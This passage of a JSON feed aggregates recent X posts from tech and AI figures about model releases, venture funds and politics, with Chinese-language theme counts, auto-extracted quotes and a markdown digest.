robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://x.com/soumithchintala/status/2047191747793649805", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047145172337836139", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://x.com/DavidSacks/status/2047104229773279572", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://x.com/DavidSacks/status/2047103978979119580", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://x.com/CryptoCred/status/2047079463750377958", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://x.com/eladgil/status/2047052737762980083", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://x.com/AravSrinivas/status/2047019688920756504", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://x.com/AravSrinivas/status/2047016400292839808", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://x.com/morganhousel/status/2047013991046881663", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://x.com/naval/status/2046991137022648800", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://x.com/liuliu/status/2046986486629986435", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see.\n\n@eddiejiao_obj, @drewocarr and I built a prototype to see how this could actually work, and set out to make it real. We're calling it Flipbook. (1/5)", + "url": "https://x.com/karpathy/status/2046982383430496444", + "published_at": "2026-04-22T16:00:05+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://x.com/naval/status/2046961436593713241", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://x.com/HarryStebbings/status/2046938853445959738", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://x.com/eladgil/status/2046722094348771758", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://x.com/eladgil/status/2046695194054320150", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://x.com/HarryStebbings/status/2046684883494600911", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://x.com/eladgil/status/2046674350993223784", + "published_at": "2026-04-21T19:36:05+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://x.com/JeffDean/status/2046673188193701901", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://x.com/eladgil/status/2046640542218604783", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.", + "url": "https://x.com/AravSrinivas/status/2046638770162995603", + "published_at": "2026-04-21T17:14:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://x.com/JeffDean/status/2046635685206208533", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://x.com/JeffDean/status/2046632664493384060", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://x.com/DavidSacks/status/2046632586735243420", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://x.com/HarryStebbings/status/2046614183513604299", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "⌘ ⌘", + "url": "https://x.com/AravSrinivas/status/2046606492649091212", + "published_at": "2026-04-21T15:06:26+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "RT by @morganhousel: I’m in love with this sentence:\n\n“The best math you can learn is how to calculate the future cost of current decisions.”", + "url": "https://x.com/morganhousel/status/2046429717834654025", + "published_at": "2026-04-21T03:24:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Whoa 🤯", + "url": "https://x.com/AravSrinivas/status/2046419556424675677", + "published_at": "2026-04-21T02:43:37+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2046375878368940239", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "", + "url": "https://x.com/AravSrinivas/status/2046347469488107839", + "published_at": "2026-04-20T21:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://x.com/JeffDean/status/2046344875994739028", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。", + "url": "https://x.com/svwang1/status/2046343776378257515", + "published_at": "2026-04-20T21:42:30+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。", + "url": "https://x.com/svwang1/status/2046336504407142606", + "published_at": "2026-04-20T21:13:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://x.com/eladgil/status/2046300649483374704", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://x.com/eladgil/status/2046284381439103043", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://x.com/eladgil/status/2046284194943500453", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://x.com/eladgil/status/2046284191885922498", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://x.com/eladgil/status/2046284190132609299", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://x.com/eladgil/status/2046284188622737554", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://x.com/eladgil/status/2046284184877187540", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://x.com/soumithchintala/status/2046282944139215141", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 170 + }, + { + "title": "模型能力", + "count": 53 + }, + { + "title": "交易与市场", + "count": 15 + }, + { + "title": "投融资与并购", + "count": 13 + }, + { + "title": "算力与芯片", + "count": 8 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "其他", + "subtitle": "近30天样本 182 条", + "bullets": [ + "其他相关讨论热度位居前列。" + ] + }, + { + "id": "t2", + "title": "模型能力", + "subtitle": "近30天样本 43 条", + "bullets": [ + "模型能力相关讨论热度位居前列。" + ] + }, + { + "id": "t3", + "title": "交易与市场", + "subtitle": "近30天样本 17 条", + "bullets": [ + "交易与市场相关讨论热度位居前列。" + ] + } + ], + "p0_events": [ + { + "id": "p1", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much w", + "meta": "@elonmusk | 2026-04-27T16:54:21+00:00", + "summary": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "url": "https://x.com//status/2048807976991850953" + }, + { + "id": "p2", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI", + "meta": "@elonmusk | 2026-04-27T16:39:59+00:00", + "summary": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major rep", + "url": "https://x.com//status/2048804363595059425" + }, + { + "id": "p3", + "title": "Exactly", + "meta": "@elonmusk | 2026-04-27T16:31:33+00:00", + "summary": "Exactly", + "url": "https://x.com//status/2048802239272169582" + }, + { + "id": "p4", + "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full ", + "meta": "@elonmusk | 2026-04-27T16:30:27+00:00", + "summary": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the acti", + "url": "https://x.com//status/2048801964457140540" + }, + { + "id": "p5", + "title": "Scam Altman", + "meta": "@elonmusk | 2026-04-27T16:21:30+00:00", + "summary": "Scam Altman", + "url": "https://x.com//status/2048799712375902624" + }, + { + "id": "p6", + "title": "Americans spent over $109 billion on lottery tickets last ye", + "meta": "@charliebilello | 2026-04-27T16:21:01+00:00", + "summary": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com//status/2048799590044852390" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", + "speaker": "@elonmusk", + "date": "2026-04-27T16:54:21+00:00", + "note": "自动抽取", + "url": "https://x.com/elonmusk/status/2048807976991850953" + }, + { + "id": "q2", + "quote": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerfu", + "speaker": "@elonmusk", + "date": "2026-04-27T16:39:59+00:00", + "note": "自动抽取", + "url": "https://x.com/elonmusk/status/2048804363595059425" + }, + { + "id": "q3", + "quote": "Exactly", + "speaker": "@elonmusk", + "date": "2026-04-27T16:31:33+00:00", + "note": "自动抽取", + "url": "https://x.com/elonmusk/status/2048802239272169582" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "@GaryMarcus", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c2", + "title": "@sama", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c3", + "title": "@paulg", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + }, + { + "id": "c4", + "title": "@pmarca", + "subtitle": "活跃推文 20 条", + "level": "P1", + "items": [ + { + "text": "该账号近30天持续活跃,建议重点跟踪。", + "url": "" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "已启用规则兜底", + "detail": "本次 LLM 结构化输出为空,已切换到规则归纳结果。" + }, + { + "id": "llm-fallback-error", + "level": "MID", + "title": "LLM 编排暂不可用", + "detail": "本次使用规则兜底:Expecting ',' delimiter: line 1 column 6529 (char 6528)" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T17:07:38.921884+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 259\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(1 条)\n\n**[2026-04-22T16:00:05+00:00]**\n> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built…\n[原文链接](https://x.com/karpathy/status/2046982383430496444)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://x.com/sama/status/2048755148361707946)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://x.com/sama/status/2048751392031203544)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://x.com/sama/status/2048554097985593849)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://x.com/sama/status/2048552677433643427)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://x.com/sama/status/2048428561481265539)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://x.com/sama/status/2048426122854228141)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://x.com/sama/status/2048224374264885396)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://x.com/sama/status/2048165186482389253)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://x.com/sama/status/2048160448340767038)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://x.com/sama/status/2048160404376105179)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://x.com/sama/status/2048062261584077149)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://x.com/sama/status/2047823357635354814)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://x.com/sama/status/2047787124846653895)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://x.com/sama/status/2047683787828703289)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://x.com/sama/status/2047473914528563592)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://x.com/sama/status/2047403771416940715)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://x.com/sama/status/2047395562501411058)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://x.com/sama/status/2047392357482639749)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://x.com/sama/status/2047386955550470245)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://x.com/sama/status/2047381565534322694)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(10 条)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://x.com/AravSrinivas/status/2047753276888854595)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047748486767272243)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047145172337836139)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://x.com/AravSrinivas/status/2047019688920756504)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://x.com/AravSrinivas/status/2047016400292839808)\n\n**[2026-04-21T17:14:42+00:00]**\n> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.\n[原文链接](https://x.com/AravSrinivas/status/2046638770162995603)\n\n**[2026-04-21T15:06:26+00:00]**\n> ⌘ ⌘\n[原文链接](https://x.com/AravSrinivas/status/2046606492649091212)\n\n**[2026-04-21T02:43:37+00:00]**\n> RT by @AravSrinivas: Whoa 🤯\n[原文链接](https://x.com/AravSrinivas/status/2046419556424675677)\n\n**[2026-04-20T21:57:10+00:00]**\n> \n[原文链接](https://x.com/AravSrinivas/status/2046347469488107839)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://x.com/ylecun/status/2048469956627468510)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://x.com/ylecun/status/2048453901930660058)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://x.com/ylecun/status/2048432684930654430)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://x.com/ylecun/status/2048399621492236615)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://x.com/ylecun/status/2048293118781296734)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5…\n[原文链接](https://x.com/ylecun/status/2048118689258487857)\n\n**[2026-04-25T16:01:07+00:00]**\n> RT by @ylecun: When 